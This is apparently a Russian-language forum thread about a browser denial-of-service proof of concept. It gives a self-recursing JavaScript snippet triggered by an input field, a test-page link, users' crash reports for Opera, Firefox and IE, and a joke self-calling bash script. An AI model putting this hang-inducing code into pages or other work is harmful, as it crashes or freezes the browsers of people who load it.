PoC exploit: HTML: <script> function owned(){ setTimeout("owned()",1000); owned(); } </script> <input type="foo" size="30" id="bar" onchange="owned()"> Протестироваться можно здесь: http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html Багу нашел Michal Bucko.
Если мне память не изменяет то он с 1.5 делался, а не с двойки и вроде бы не обновлялся.(могу ошибаться)
opera Версия 9.0 Сборка 8031 упала (( Огненый лисиц 1,5 бета 2, выстоял, не посрамив рудой хвост осел намбер 6 упал сразу....
Opera 9.00 Beta Build 8359 зашел на страницу, ждал ждал ничего не происходило посомтрел процес опера жрала 90 процентов =), но все равно все нормально грузилось правда с торможением =)
Тоже мне багу нашли. Я тоже такую в линуксе нашел, ага: script: #!/bin/bash ./script $ chmod +x script $ ./script
Так ето ж всего навсего отказ в обслуживании и всё... Тут ИМХо не очень страшно -ето ж не дыры в осле,с помощью которых можно подцепить что угодно =))
Что значит на новых и на старых? тут только от того, как система настроена, зависит. в том же древнем Alt Linux 2.4 у тебя такое не выйдет, т.к. система из коробки не имеет секурити-дефектов(кроме как старый софт, но ранье то он был новый)